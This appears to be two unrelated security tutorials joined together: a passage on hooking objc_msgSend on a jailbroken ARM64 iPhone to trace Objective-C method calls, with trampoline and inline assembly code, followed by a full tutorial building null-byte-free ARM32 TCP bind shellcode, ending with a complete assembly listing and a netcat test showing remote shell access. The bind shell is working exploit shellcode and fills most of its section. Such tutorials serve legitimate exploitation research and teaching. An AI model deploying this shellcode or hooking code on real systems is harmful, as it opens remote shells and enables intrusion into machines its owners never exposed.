The useful part is that a selector is a C-String that contains the method name and its named parameters. A non-obfuscating compiler does not remove them because the names are needed to resolve the implementing function.

Shockingly, the function that implements the method takes in two extra parameters ahead of the user defined parameters. Those are the self and the op. If you look at the disassembly, it looks something like this (taken from Damn Vulnerable iOS App):

__text:100005144
__text:100005144 ; YapDatabaseViewState - (id)createGroup:(id) withCapacity:(uint64_t)
__text:100005144 ; Attributes: bp-based frame
__text:100005144
__text:100005144 ; id __cdecl -[YapDatabaseViewState createGroup:withCapacity:]
                        ;         (struct YapDatabaseViewState *self, SEL, id, uint64_t)
__text:100005144 __YapDatabaseViewState_createGroup_withCapacity__

Notice that the C function is called __YapDatabaseViewState_createGroup_withCapacity__, the method is called createGroup and the class is YapDatabaseViewState. It takes two parameters: an idand a uint64_t. However, it also takes a struct YapDatabaseViewState *self and a SEL. This signature essentially matches the signature of objc_msgSend, except that the latter has variadic parameters.

The existence and the location of the extra parameters is not accidental. The reason for this is that objc_msgSend will actually redirect execution to the implementing function by looking up the selector to function mapping within the class object. Once it finds the target it simply jumps there without having to readjust the parameter registers. This is why I referred to this as a routing mechanism, rather than message passing. Of course, I say that due to the implementation details, rather than the conceptual basis for what is happening here.

Quite smart actually, because this allows the language to be very dynamic in nature i.e. I can remap SEL to Function mapping and change the implementation of any particular method. This is also great for reverse engineering because this system retains a lot of the labeling information that the developer puts into the source code. I quite like that.

The plan

Now that we’ve seen how Objective-C makes method calls, we notice that objc_msgSend becomes a choke point for all method calls. It is like a hub in a poorly setup network with many many users. So, in order to get a list of every method called all we have to do is watch this function. One way to do this is via a debugger such as LLDB or GDB. However, the trouble is that a debugger is fairly heavy and mostly interactive. It’s not really good when you want to capture a run or watch the process to pin point a bug. Also, the performance hit might be too much. For more offensive work, you can’t embed one of those debuggers into a lite weight implant.

So, what we are going to do is hook the objc_msgSend function on an ARM64 iOS Objective-C program. This will allow us to specify a function to get called before objc_msgSend is actually executed. We will do this on a Jailbroken iPhone — so no security mechanism bypasses here, the Jailbreak takes care of all of that.

Figure 1: Patching at high level

On the high level the hooking works something like this. objc_msgSend instructions are modified in the preamble to jump to another function. This other function will perform our custom tracing features, restore the CPU state and return to a jump table. The jump table is a dynamically generated piece of code that will execute the preamble instructions that we’ve overwritten and jump back to objc_msgSend to continue with normal execution.

Hooking

The implementation of the technique presented can be found in the objc_tracerepository.

The first thing we are going to do is allocate what I call a jump page. It is called so because this memory will be a page of code that jumps back to continue executing the original function.

s_jump_page* t_func = 
   (s_jump_page*)mmap(NULL, 4096, 
    		PROT_READ | PROT_WRITE, 
    		MAP_ANON  | MAP_PRIVATE, -1, 0);

Notice that the type of the jump page is s_jump_page which is a structure that will represent our soon to be generated code.

typedef struct {
    instruction_t     inst[4];    
    s_jump_patch jump_patch[5];
    instruction_t     backup[4];    
} s_jump_page;

The s_jump_page structure contains four instructions that we overwrite (think back to the diagram at step 2). We also keep a backup of these instruction at the end of the structure — not strictly necessary but it makes for easier unhooking. Then there are five structures called jump patches. These are special sets of instructions that will redirect the CPU to an arbitrary location in memory. Jump patches are also represented by a structure.

typedef struct {
    instruction_t i1_ldr;
    instruction_t i2_br;
    address_t jmp_addr;
} s_jump_patch;

Using these structures we can build a very elegant and transparent mechanism for building dynamic code. All we have to do is create an inline assembly function in C and cast it to the structure.

__attribute__((naked))
void d_jump_patch() {
    __asm__ __volatile__(
        // trampoline to somewhere else.
        "ldr x16, #8;\n"
        "br x16;\n"
        ".long 0;\n" // place for jump address
        ".long 0;\n"
    );
}

This is ARM64 Assembly to load a 64-bit value from address PC+8 then jump to it. The .long placeholders are places for the target address.

s_jump_patch* jump_patch(){
    return (s_jump_patch*)d_jump_patch;
}

In order to use this we simply cast the code i.e. the d_jump_patch function pointer to the structure and set the value of the jmp_addr field. This is how we implement the function that generates the custom trampoline.

void write_jmp_patch(void* buffer, void* dst) {
    // returns the pointer to d_jump_patch.
    s_jump_patch patch = *(jump_patch());

    patch.jmp_addr = (address_t)dst;

    *(s_jump_patch*)buffer = patch;
}

We take advantage of the C compiler automatically copying the entire size of the structure instead of using memcpy. In order to patch the original objc_msgSend function we use write_jmp_patch function and point it to the hook function. Of course, before we can do that we copy the original instructions to the jump page for later execution and back up.

    //   Building the Trampoline
    *t_func = *(jump_page());
    
    // save first 4 32bit instructions
    //   original -> trampoline
    instruction_t* orig_preamble = (instruction_t*)o_func;
    for(int i = 0; i < 4; i++) {
        t_func->inst  [i] = orig_preamble[i];
        t_func->backup[i] = orig_preamble[i];
    }

Now that we have saved the original instructions from objc_msgSend we have to be aware that we’ve copied four instructions. A lot can happen in four instructions, all sorts of decisions and branches. In particular I’m worried about branches because they can be relative. So, what we need to do is validate that t_func->inst doesn’t have any branches. If it does, they will need to modified to preserve functionality.

This is why s_jump_page has five jump patches:

  1. All four instructions are non branches, so the first jump patch will automatically redirect execution to objc_msgSend+16 (skipping the patch).
  2. There are up to four branch instructions, so each of the jump patches will be used to redirect to the appropriate offset into objc_msgSend.

Checking for branch instructions is a bit tricky. ARM64 is a RISC architecture and does not present the same variety of instructions as, say, x86-64. But, there are still quite a few [2].

  1. Conditional Branches:
    • B.cond label jumps to PC relative offset.
    • CBNZ Wn|Xn, label jumps to PC relative offset if Wn is not equal to zero.
    • CBZ Wn|Xn, label jumps to PC relative offset if Wn is equal to zero.
    • TBNZ Xn|Wn, #uimm6, label jumps to PC relative offset if bit number uimm6 in register Xn is not zero.
    • TBZ Xn|Wn, #uimm6, label jumps to PC relative offset if bit number uimm6 in register Xn is zero.
  2. Unconditional Branches:
    • B label jumps to PC relative offset.
    • BL label jumps to PC relative offset, writing the address of the next sequential instruction to register X30. Typically used for making function calls.
  3. Unconditional Branches to register:
    • BLR Xm unconditionally jumps to address in Xm, writing the address of the next sequential instruction to register X30.
    • BR Xm jumps to address in Xm.
    • RET {Xm} jumps to register Xm.

We don’t particular care about category three because, register states should not influenced by our hooking mechanism. However, category one and two are PC relative and therefore need to be updated if found in the preamble.

So, I wrote a function that updates the instructions. At the moment it only handles a subset of cases, specifically the B.cond and B instructions. The former is found in objc_msgSend.

__text:18DBB41C0  EXPORT _objc_msgSend
__text:18DBB41C0   _objc_msgSend 
__text:18DBB41C0     CMP             X0, #0
__text:18DBB41C4     B.LE            loc_18DBB4230
__text:18DBB41C8   loc_18DBB41C8
__text:18DBB41C8     LDR             X13, [X0]
__text:18DBB41CC     AND             X9, X13, #0x1FFFFFFF8

Now, I don’t know about you but I don’t particularly like to use complicated bit-wise operations to extract and modify data. It’s kind of fun to do so, but it is also fragile and hard to read. Luckily for us, C was designed to work at such a low level. Each ARM64 instruction is four bytes and so we use bit fields in C structures to deal with them!

typedef struct {
    uint32_t offset   : 26;
    uint32_t inst_num : 6;
} inst_b;

This is the unconditional PC relative jump.

typedef struct {
    uint32_t condition: 4;
    uint32_t reserved : 1;
    uint32_t offset   : 19;
    uint32_t inst_num : 8;
} inst_b_cond;

And this one is the conditional PC relative jump. Back in the day, I wrote a plugin for IDAPro that gives the details of instruction under the cursor. It is called IdaRef and, for it, I produced an ASCII text file that has all the instruction and their bit fields clearly written out [3]. So the B.cond looks like this in memory. Notice right to left bit numbering.

31 30 29 28 27 26 25 24 23                                                              5 4 3            0
0  1  0  1  0  1  0  0                                      imm19                         0     cond

That is what we map our inst_b_cond structure to. Doing so allows us very easy abstraction over bit manipulation.

void check_branches(s_jump_page* t_func, instruction_t* o_func) {
	...        
        instruction_t inst = t_func->inst[i];
        inst_b*       i_b      = (inst_b*)&inst;
        inst_b_cond*  i_b_cond = (inst_b_cond*)&inst;

        ...
        } else if(i_b_cond->inst_num == 0x54) {
            // conditional branch

            // save the original branch offset
            branch_offset = i_b_cond->offset;
            i_b_cond->offset = patch_offset;
        }


        ...
            // set jump point into the original function, 
            //   don't forget that it is PC relative
            t_func->jump_patch[use_jump_patch].jmp_addr = 
                 (address_t)( 
                 	((instruction_t*)o_func) 
                 	+ branch_offset + i);
        ...

With some important details removed, I’d like to highlight how we are checking the type of the instruction by overlaying the structure over the instruction integer and checking to see if the value of the instruction number is correct. If it is, then we use that pointer to read the offset and modify it to point to one of the jump patches. In the patch we place the absolute value of the address where the instruction would’ve jumped were it still back in the original objc_msgSend function. We do so for every branch instruction we might encounter.

Once the jump page is constructed we insert the patch into objc_msgSend and complete the loop. The most important thing is, of course, that the hook function restores all the registers to the state just before CPU enters into objc_msgSend otherwise the whole thing will probably crash.

It is important to note that at the moment we require that the function to be hooked has to be at least four instructions long because that is the size of the patch. Other than that we don’t even care if the target is a proper C function.

Do look through the implementation [4], I skip over some details that glues things together but the important bits that I mention should be enough to understand, in great detail, what is happening under the hood.

Interpreting the call

Now that function hooking is done, it is time to level up and interpret the results. This is where we actually implement the objc_trace functionality. So, the patch to objc_msgSend actually redirects execution to one of our functions:

__attribute__((naked))
id objc_msgSend_trace(id self, SEL op) {
    __asm__ __volatile__ (
        "stp fp, lr, [sp, #-16]!;\n"
        "mov fp, sp;\n"

        "sub    sp, sp, #(10*8 + 8*16);\n"
        "stp    q0, q1, [sp, #(0*16)];\n"
        "stp    q2, q3, [sp, #(2*16)];\n"
        "stp    q4, q5, [sp, #(4*16)];\n"
        "stp    q6, q7, [sp, #(6*16)];\n"
        "stp    x0, x1, [sp, #(8*16+0*8)];\n"
        "stp    x2, x3, [sp, #(8*16+2*8)];\n"
        "stp    x4, x5, [sp, #(8*16+4*8)];\n"
        "stp    x6, x7, [sp, #(8*16+6*8)];\n"
        "str    x8,     [sp, #(8*16+8*8)];\n"

        "BL _hook_callback64_pre;\n"
        "mov x9, x0;\n"

        // Restore all the parameter registers to the initial state.
        "ldp    q0, q1, [sp, #(0*16)];\n"
        "ldp    q2, q3, [sp, #(2*16)];\n"
        "ldp    q4, q5, [sp, #(4*16)];\n"
        "ldp    q6, q7, [sp, #(6*16)];\n"
        "ldp    x0, x1, [sp, #(8*16+0*8)];\n"
        "ldp    x2, x3, [sp, #(8*16+2*8)];\n"
        "ldp    x4, x5, [sp, #(8*16+4*8)];\n"
        "ldp    x6, x7, [sp, #(8*16+6*8)];\n"
        "ldr    x8,     [sp, #(8*16+8*8)];\n"
        // Restore the stack pointer, frame pointer and link register
        "mov    sp, fp;\n"
        "ldp    fp, lr, [sp], #16;\n"

        "BR x9;\n"       // call the jump page
    );
}

This function stores all calling convention relevant registers on the stack and calls our, _hook_callback64_pre, regular C function that can assume that it is the objc_msgSend as it was called. In this function we can read parameters as if they were sent to the method call, this includes the class instance and the selector. Once _hook_callback64_pre returns our objc_msgSend_trace function will restore the registers and branch to the configured jump page which will eventually branch back to the original call.

void* hook_callback64_pre(id self, SEL op, void* a1, void* a2, void* a3, void* a4, void* a5) {
	// get the important bits: class, function
    char* classname = (char*) object_getClassName( self );
    if(classname == NULL) {
        classname = "nil";
    }
    
    char* opname = (char*) op;
    ...
    return original_msgSend;
}

Once we get into the hook_callback64_pre function, things get much simpler since we can use the objc API to do our work. The only trick is the realization that the SEL type is actually a char* which we cast directly. This gives us the full selector. Counting colons will give us the count of parameters the method is expecting. When everything is done the output looks something like this:

iPhone:~ root# DYLD_INSERT_LIBRARIES=libobjc_trace.dylib /Applications/Maps.app/Maps
objc_msgSend function substrated from 0x197967bc0 to 0x10065b730, trampoline 0x100718000
000000009c158310: [NSStringROMKeySet_Embedded alloc ()]
000000009c158310: [NSSharedKeySet initialize ()]
000000009c158310: [NSStringROMKeySet_Embedded initialize ()]
000000009c158310: [NSStringROMKeySet_Embedded init ()]
000000009c158310: [NSStringROMKeySet_Embedded initWithKeys:count: (0x0 0x0 )]
000000009c158310: [NSStringROMKeySet_Embedded setSelect: (0x1 )]
000000009c158310: [NSStringROMKeySet_Embedded setC: (0x1 )]
000000009c158310: [NSStringROMKeySet_Embedded setM: (0xf6a )]
000000009c158310: [NSStringROMKeySet_Embedded setFactor: (0x7b5 )]

Conclusion

We modify the objc_msgSend preamble to jump to our hook function. The hook function then does whatever and restores the CPU state. It then jumps into the jump page which executes the possibly modified preamble instructions and jumps back into objc_msgSend to continue execution. We also maintain the original unmodified preamble for restoration when we need to remove the hook. Then we use the parameters that were sent to objc_msgSend to interpret the call and print out which method was called with which parameters.

As you can see using function hooking for making objc_trace is but one use case. But this use case is incredibly useful for blackbox security testing. That is particularly true for initial discovery work of learning about the application.


[1] objc-msg-arm64.s

[2] ARM Reference Manual

[3] ARM Instruction Details

[4] objc_trace.m

TCP Bind Shell in Assembly (ARM 32-bit)

In this tutorial, you will learn how to write TCP bind shellcode that is free of null bytes and can be used as shellcode for exploitation. When I talk about exploitation, I’m strictly referring to approved and legal vulnerability research. For those of you relatively new to software exploitation, let me tell you that this knowledge can, in fact, be used for good. If I find a software vulnerability like a stack overflow and want to test its exploitability, I need working shellcode. Not only that, I need techniques to use that shellcode in a way that it can be executed despite the security measures in place. Only then I can show the exploitability of this vulnerability and the techniques malicious attackers could be using to take advantage of security flaws.

After going through this tutorial, you will not only know how to write shellcode that binds a shell to a local port, but also how to write any shellcode for that matter. To go from bind shellcode to reverse shellcode is just about changing 1-2 functions, some parameters, but most of it is the same. Writing a bind or reverse shell is more difficult than creating a simple execve() shell. If you want to start small, you can learn how to write a simple execve() shell in assembly before diving into this slightly more extensive tutorial. If you need a refresher in Arm assembly, take a look at my ARM Assembly Basics tutorial series, or use this Cheat Sheet:

Before we start, I’d like to remind you that we’re creating ARM shellcode and therefore need to set up an ARM lab environment if you don’t already have one. You can set it up yourself (Emulate Raspberry Pi with QEMU) or save time and download the ready-made Lab VM I created (ARM Lab VM). Ready?

UNDERSTANDING THE DETAILS

First of all, what is a bind shell and how does it really work? With a bind shell, you open up a communication port or a listener on the target machine. The listener then waits for an incoming connection, you connect to it, the listener accepts the connection and gives you shell access to the target system.

This is different from how Reverse Shells work. With a reverse shell, you make the target machine communicate back to your machine. In that case, your machine has a listener port on which it receives the connection back from the target system.

 

Both types of shell have their advantages and disadvantages depending on the target environment. It is, for example, more common that the firewall of the target network fails to block outgoing connections than incoming. This means that your bind shell would bind a port on the target system, but since incoming connections are blocked, you wouldn’t be able to connect to it. Therefore, in some scenarios, it is better to have a reverse shell that can take advantage of firewall misconfigurations that allow outgoing connections. If you know how to write a bind shell, you know how to write a reverse shell. There are only a couple of changes necessary to transform your assembly code into a reverse shell once you understand how it is done.

To translate the functionalities of a bind shell into assembly, we first need to get familiar with the process of a bind shell:

  1. Create a new TCP socket
  2. Bind socket to a local port
  3. Listen for incoming connections
  4. Accept incoming connection
  5. Redirect STDIN, STDOUT and STDERR to a newly created socket from a client
  6. Spawn the shell

This is the C code we will use for our translation.

#include <stdio.h> 
#include <sys/types.h>  
#include <sys/socket.h> 
#include <netinet/in.h> 

int host_sockid;    // socket file descriptor 
int client_sockid;  // client file descriptor 

struct sockaddr_in hostaddr;            // server aka listen address

int main() 
{ 
    // Create new TCP socket 
    host_sockid = socket(PF_INET, SOCK_STREAM, 0); 

    // Initialize sockaddr struct to bind socket using it 
    hostaddr.sin_family = AF_INET;                  // server socket type address family = internet protocol address
    hostaddr.sin_port = htons(4444);                // server port, converted to network byte order
    hostaddr.sin_addr.s_addr = htonl(INADDR_ANY);   // listen to any address, converted to network byte order

    // Bind socket to IP/Port in sockaddr struct 
    bind(host_sockid, (struct sockaddr*) &hostaddr, sizeof(hostaddr)); 

    // Listen for incoming connections 
    listen(host_sockid, 2); 

    // Accept incoming connection 
    client_sockid = accept(host_sockid, NULL, NULL); 

    // Duplicate file descriptors for STDIN, STDOUT and STDERR 
    dup2(client_sockid, 0); 
    dup2(client_sockid, 1); 
    dup2(client_sockid, 2); 

    // Execute /bin/sh 
    execve("/bin/sh", NULL, NULL); 
    close(host_sockid); 

    return 0; 
}
STAGE ONE: SYSTEM FUNCTIONS AND THEIR PARAMETERS

The first step is to identify the necessary system functions, their parameters, and their system call numbers. Looking at the C code above, we can see that we need the following functions: socket, bind, listen, accept, dup2, execve. You can figure out the system call numbers of these functions with the following command:

pi@raspberrypi:~/bindshell $ cat /usr/include/arm-linux-gnueabihf/asm/unistd.h | grep socket
#define __NR_socketcall             (__NR_SYSCALL_BASE+102)
#define __NR_socket                 (__NR_SYSCALL_BASE+281)
#define __NR_socketpair             (__NR_SYSCALL_BASE+288)
#undef __NR_socketcall

If you’re wondering about the value of _NR_SYSCALL_BASE, it’s 0:

root@raspberrypi:/home/pi# grep -R "__NR_SYSCALL_BASE" /usr/include/arm-linux-gnueabihf/asm/
/usr/include/arm-linux-gnueabihf/asm/unistd.h:#define __NR_SYSCALL_BASE 0

These are all the syscall numbers we’ll need:

#define __NR_socket    (__NR_SYSCALL_BASE+281)
#define __NR_bind      (__NR_SYSCALL_BASE+282)
#define __NR_listen    (__NR_SYSCALL_BASE+284)
#define __NR_accept    (__NR_SYSCALL_BASE+285)
#define __NR_dup2      (__NR_SYSCALL_BASE+ 63)
#define __NR_execve    (__NR_SYSCALL_BASE+ 11)

The parameters each function expects can be looked up in the linux man pages, or on w3challs.com.

The next step is to figure out the specific values of these parameters. One way of doing that is to look at a successful bind shell connection using strace. Strace is a tool you can use to trace system calls and monitor interactions between processes and the Linux Kernel. Let’s use strace to test the C version of our bind shell. To reduce the noise, we limit the output to the functions we’re interested in.

Terminal 1:
pi@raspberrypi:~/bindshell $ gcc bind_test.c -o bind_test
pi@raspberrypi:~/bindshell $ strace -e execve,socket,bind,listen,accept,dup2 ./bind_test
Terminal 2:
pi@raspberrypi:~ $ netstat -tlpn
Proto Recv-Q  Send-Q  Local Address  Foreign Address  State     PID/Program name
tcp    0      0       0.0.0.0:22     0.0.0.0:*        LISTEN    - 
tcp    0      0       0.0.0.0:4444   0.0.0.0:*        LISTEN    1058/bind_test 
pi@raspberrypi:~ $ netcat -nv 0.0.0.0 4444
Connection to 0.0.0.0 4444 port [tcp/*] succeeded!

This is our strace output:

pi@raspberrypi:~/bindshell $ strace -e execve,socket,bind,listen,accept,dup2 ./bind_test
execve("./bind_test", ["./bind_test"], [/* 49 vars */]) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
listen(3, 2) = 0
accept(3, 0, NULL) = 4
dup2(4, 0) = 0
dup2(4, 1) = 1
dup2(4, 2) = 2
execve("/bin/sh", [0], [/* 0 vars */]) = 0

Now we can fill in the gaps and note down the values we’ll need to pass to the functions of our assembly bind shell.

STAGE TWO: STEP BY STEP TRANSLATION

In the first stage, we answered the following questions to get everything we need for our assembly program:

  1. Which functions do I need?
  2. What are the system call numbers of these functions?
  3. What are the parameters of these functions?
  4. What are the values of these parameters?

This step is about applying this knowledge and translating it to assembly. Split each function into a separate chunk and repeat the following process:

  1. Map out which register you want to use for which parameter
  2. Figure out how to pass the required values to these registers
    1. How to pass an immediate value to a register
    2. How to nullify a register without directly moving a #0 into it (we need to avoid null-bytes in our code and must therefore find other ways to nullify a register or a value in memory)
    3. How to make a register point to a region in memory which stores constants and strings
  3. Use the right system call number to invoke the function and keep track of register content changes
    1. Keep in mind that the result of a system call will land in r0, which means that in case you need to reuse the result of that function in another function, you need to save it into another register before invoking the function.
    2. Example: host_sockid = socket(2, 1, 0) – the result (host_sockid) of the socket call will land in r0. This result is reused in other functions like listen(host_sockid, 2), and should therefore be preserved in another register.

0 – Switch to Thumb Mode

The first thing you should do to reduce the possibility of encountering null-bytes is to use Thumb mode. In Arm mode, the instructions are 32-bit, in Thumb mode they are 16-bit. This means that we can already reduce the chance of having null-bytes by simply reducing the size of our instructions. To recap how to switch to Thumb mode: ARM instructions must be 4 byte aligned. To change the mode from ARM to Thumb, set the LSB (Least Significant Bit) of the next instruction’s address (found in PC) to 1 by adding 1 to the PC register’s value and saving it to another register. Then use a BX (Branch and eXchange) instruction to branch to this other register containing the address of the next instruction with the LSB set to one, which makes the processor switch to Thumb mode. It all boils down to the following two instructions.

.section .text
.global _start
_start:
    .ARM
    add     r3, pc, #1            
    bx      r3

From here you will be writing Thumb code and will therefore need to indicate this by using the .THUMB directive in your code.

1 – Create new Socket

 

These are the values we need for the socket call parameters:

root@raspberrypi:/home/pi# grep -R "AF_INET\|PF_INET \|SOCK_STREAM =\|IPPROTO_IP =" /usr/include/
/usr/include/linux/in.h: IPPROTO_IP = 0,                               // Dummy protocol for TCP 
/usr/include/arm-linux-gnueabihf/bits/socket_type.h: SOCK_STREAM = 1,  // Sequenced, reliable, connection-based
/usr/include/arm-linux-gnueabihf/bits/socket.h:#define PF_INET 2       // IP protocol family. 
/usr/include/arm-linux-gnueabihf/bits/socket.h:#define AF_INET PF_INET

After setting up the parameters, you invoke the socket system call with the svc instruction. The result of this invocation will be our host_sockid and will end up in r0. Since we need host_sockid later on, let’s save it to r4.

In ARM, you can’t simply move any immediate value into a register. If you’re interested more details about this nuance, there is a section in the Memory Instructions chapter (at the very end).

To check if I can use a certain immediate value, I wrote a tiny script (ugly code, don’t look) called rotator.py.

pi@raspberrypi:~/bindshell $ python rotator.py
Enter the value you want to check: 281
Sorry, 281 cannot be used as an immediate number and has to be split.

pi@raspberrypi:~/bindshell $ python rotator.py
Enter the value you want to check: 200
The number 200 can be used as a valid immediate number.
50 ror 30 --> 200

pi@raspberrypi:~/bindshell $ python rotator.py
Enter the value you want to check: 81
The number 81 can be used as a valid immediate number.
81 ror 0 --> 81

Final code snippet:

    .THUMB
    mov     r0, #2
    mov     r1, #1
    sub     r2, r2, r2
    mov     r7, #200
    add     r7, #81                // r7 = 281 (socket syscall number) 
    svc     #1                     // r0 = host_sockid value 
    mov     r4, r0                 // save host_sockid in r4

2 – Bind Socket to Local Port

 

With the first instruction, we store a structure object containing the address family, host port and host address in the literal pool and reference this object with pc-relative addressing. The literal pool is a memory area in the same section (because the literal pool is part of the code) storing constants, strings, or offsets. Instead of calculating the pc-relative offset manually, you can use an ADR instruction with a label. ADR accepts a PC-relative expression, that is, a label with an optional offset where the address of the label is relative to the PC label. Like this:

// bind(r0, &sockaddr, 16)
 adr r1, struct_addr    // pointer to address, port
 [...]
struct_addr:
.ascii "\x02\xff"       // AF_INET 0xff will be NULLed 
.ascii "\x11\x5c"       // port number 4444 
.byte 1,1,1,1           // IP Address

The next 5 instructions are STRB (store byte) instructions. A STRB instruction stores one byte from a register to a calculated memory region. The syntax [r1, #1] means that we take R1 as the base address and the immediate value (#1) as an offset.

In the first instruction we made R1 point to the memory region where we store the values of the address family AF_INET, the local port we want to use, and the IP address. We could either use a static IP address, or we could specify 0.0.0.0 to make our bind shell listen on all IPs which the target is configured with, making our shellcode more portable. Now, those are a lot of null-bytes.

Again, the reason we want to get rid of any null-bytes is to make our shellcode usable for exploits that take advantage of memory corruption vulnerabilities that might be sensitive to null-bytes. Some buffer overflows are caused by improper use of functions like ‘strcpy’. The job of strcpy is to copy data until it receives a null-byte. We use the overflow to take control over the program flow and if strcpy hits a null-byte it will stop copying our shellcode and our exploit will not work. With the strb instruction we take a null byte from a register and modify our own code during execution. This way, we don’t actually have a null byte in our shellcode, but dynamically place it there. This requires the code section to be writable and can be achieved by adding the -N flag during the linking process.

For this reason, we code without null-bytes and dynamically put a null-byte in places where it’s necessary. As you can see in the next picture, the IP address we specify is 1.1.1.1 which will be replaced by 0.0.0.0 during execution.

 

The first STRB instruction replaces the placeholder xff in \x02\xff with x00 to set the AF_INET to \x02\x00. How do we know that it’s a null byte being stored? Because r2 contains 0’s only due to the “sub r2, r2, r2” instruction which cleared the register. The next 4 instructions replace 1.1.1.1 with 0.0.0.0. Instead of the four strb instructions after strb r2, [r1, #1], you can also use one single str r2, [r1, #4] to do a full 0.0.0.0 write.

The move instruction puts the length of the sockaddr_in structure length (2 bytes for AF_INET, 2 bytes for PORT, 4 bytes for ipaddress, 8 bytes padding = 16 bytes) into r2. Then, we set r7 to 282 by simply adding 1 to it, because r7 already contains 281 from the last syscall.

// bind(r0, &sockaddr, 16)
    adr  r1, struct_addr   // pointer to address, port
    strb r2, [r1, #1]     // write 0 for AF_INET
    strb r2, [r1, #4]     // replace 1 with 0 in x.1.1.1
    strb r2, [r1, #5]     // replace 1 with 0 in 0.x.1.1
    strb r2, [r1, #6]     // replace 1 with 0 in 0.0.x.1
    strb r2, [r1, #7]     // replace 1 with 0 in 0.0.0.x
    mov r2, #16
    add r7, #1            // r7 = 281+1 = 282 (bind syscall number) 
    svc #1
    nop

3 – Listen for Incoming Connections

Here we put the previously saved host_sockid into r0. R1 is set to 2, and r7 is just increased by 2 since it still contains the 282 from the last syscall.

mov     r0, r4     // r0 = saved host_sockid 
mov     r1, #2
add     r7, #2     // r7 = 284 (listen syscall number)
svc     #1

4 – Accept Incoming Connection

 

Here again, we put the saved host_sockid into r0. Since we want to avoid null bytes, we use don’t directly move #0 into r1 and r2, but instead, set them to 0 by subtracting them from each other. R7 is just increased by 1. The result of this invocation will be our client_sockid, which we will save in r4, because we will no longer need the host_sockid that was kept there (we will skip the close function call from our C code).

    mov     r0, r4          // r0 = saved host_sockid 
    sub     r1, r1, r1      // clear r1, r1 = 0
    sub     r2, r2, r2      // clear r2, r2 = 0
    add     r7, #1          // r7 = 285 (accept syscall number)
    svc     #1
    mov     r4, r0          // save result (client_sockid) in r4

5 – STDIN, STDOUT, STDERR

 

For the dup2 functions, we need the syscall number 63. The saved client_sockid needs to be moved into r0 once again, and sub instruction sets r1 to 0. For the remaining two dup2 calls, we only need to change r1 and reset r0 to the client_sockid after each system call.

    /* dup2(client_sockid, 0) */
    mov     r7, #63                // r7 = 63 (dup2 syscall number) 
    mov     r0, r4                 // r4 is the saved client_sockid 
    sub     r1, r1, r1             // r1 = 0 (stdin) 
    svc     #1
    /* dup2(client_sockid, 1) */
    mov     r0, r4                 // r4 is the saved client_sockid 
    add     r1, #1                 // r1 = 1 (stdout) 
    svc     #1
    /* dup2(client_sockid, 2) */
    mov     r0, r4                 // r4 is the saved client_sockid
    add     r1, #1                 // r1 = 1+1 (stderr) 
    svc     #1

6 – Spawn the Shell

 

 

// execve("/bin/sh", 0, 0) 
 adr r0, shellcode     // r0 = location of "/bin/shX"
 eor r1, r1, r1        // clear register r1. R1 = 0
 eor r2, r2, r2        // clear register r2. r2 = 0
 strb r2, [r0, #7]     // store null-byte for AF_INET
 mov r7, #11           // execve syscall number
 svc #1
 nop

The execve() function we use in this example follows the same process as in the Writing ARM Shellcode tutorial where everything is explained step by step.

Finally, we put the value AF_INET (with 0xff, which will be replaced by a null), the port number, IP address, and the “/bin/sh” string at the end of our assembly code.

struct_addr:
.ascii "\x02\xff"      // AF_INET 0xff will be NULLed 
.ascii "\x11\x5c"     // port number 4444 
.byte 1,1,1,1        // IP Address 
shellcode:
.ascii "/bin/shX"
FINAL ASSEMBLY CODE

This is what our final bind shellcode looks like.

.section .text
.global _start
    _start:
    .ARM
    add r3, pc, #1         // switch to thumb mode 
    bx r3

    .THUMB
// socket(2, 1, 0)
    mov r0, #2
    mov r1, #1
    sub r2, r2, r2      // set r2 to null
    mov r7, #200        // r7 = 281 (socket)
    add r7, #81         // r7 value needs to be split 
    svc #1              // r0 = host_sockid value
    mov r4, r0          // save host_sockid in r4

// bind(r0, &sockaddr, 16)
    adr  r1, struct_addr // pointer to address, port
    strb r2, [r1, #1]    // write 0 for AF_INET
    strb r2, [r1, #4]    // replace 1 with 0 in x.1.1.1
    strb r2, [r1, #5]    // replace 1 with 0 in 0.x.1.1
    strb r2, [r1, #6]    // replace 1 with 0 in 0.0.x.1
    strb r2, [r1, #7]    // replace 1 with 0 in 0.0.0.x
    mov r2, #16          // struct address length
    add r7, #1           // r7 = 282 (bind) 
    svc #1
    nop

// listen(sockfd, 0) 
    mov r0, r4           // set r0 to saved host_sockid
    mov r1, #2        
    add r7, #2           // r7 = 284 (listen syscall number) 
    svc #1        

// accept(sockfd, NULL, NULL); 
    mov r0, r4           // set r0 to saved host_sockid
    sub r1, r1, r1       // set r1 to null
    sub r2, r2, r2       // set r2 to null
    add r7, #1           // r7 = 284+1 = 285 (accept syscall)
    svc #1               // r0 = client_sockid value
    mov r4, r0           // save new client_sockid value to r4  

// dup2(sockfd, 0) 
    mov r7, #63         // r7 = 63 (dup2 syscall number) 
    mov r0, r4          // r4 is the saved client_sockid 
    sub r1, r1, r1      // r1 = 0 (stdin) 
    svc #1

// dup2(sockfd, 1)
    mov r0, r4          // r4 is the saved client_sockid 
    add r1, #1          // r1 = 1 (stdout) 
    svc #1

// dup2(sockfd, 2) 
    mov r0, r4          // r4 is the saved client_sockid
    add r1, #1          // r1 = 2 (stderr) 
    svc #1

// execve("/bin/sh", 0, 0) 
    adr r0, shellcode   // r0 = location of "/bin/shX"
    eor r1, r1, r1      // clear register r1. R1 = 0
    eor r2, r2, r2      // clear register r2. r2 = 0
    strb r2, [r0, #7]   // store null-byte for AF_INET
    mov r7, #11         // execve syscall number
    svc #1
    nop

struct_addr:
.ascii "\x02\xff" // AF_INET 0xff will be NULLed 
.ascii "\x11\x5c" // port number 4444 
.byte 1,1,1,1 // IP Address 
shellcode:
.ascii "/bin/shX"
TESTING SHELLCODE

Save your assembly code into a file called bind_shell.s. Don’t forget the -N flag when using ld. The reason for this is that we use multiple the strb operations to modify our code section (.text). This requires the code section to be writable and can be achieved by adding the -N flag during the linking process.

pi@raspberrypi:~/bindshell $ as bind_shell.s -o bind_shell.o && ld -N bind_shell.o -o bind_shell
pi@raspberrypi:~/bindshell $ ./bind_shell

Then, connect to your specified port:

pi@raspberrypi:~ $ netcat -vv 0.0.0.0 4444
Connection to 0.0.0.0 4444 port [tcp/*] succeeded!
uname -a
Linux raspberrypi 4.4.34+ #3 Thu Dec 1 14:44:23 IST 2016 armv6l GNU/Linux

It works! Now let’s translate it into a hex string with the following command:

pi@raspberrypi:~/bindshell $ objcopy -O binary bind_shell bind_shell.bin
